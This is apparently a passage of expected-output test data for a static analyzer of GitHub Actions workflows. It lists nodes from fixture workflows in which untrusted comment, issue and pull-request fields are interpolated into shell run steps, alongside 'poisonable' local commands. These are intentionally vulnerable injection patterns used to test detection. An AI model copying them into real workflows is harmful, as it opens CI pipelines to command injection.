venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python 
scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | 
Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| 
.github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| 
.github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| 
.github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | 
.github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | 
.github/workflows/multiline2.yml@40:9:46:6 | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> 
$GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | 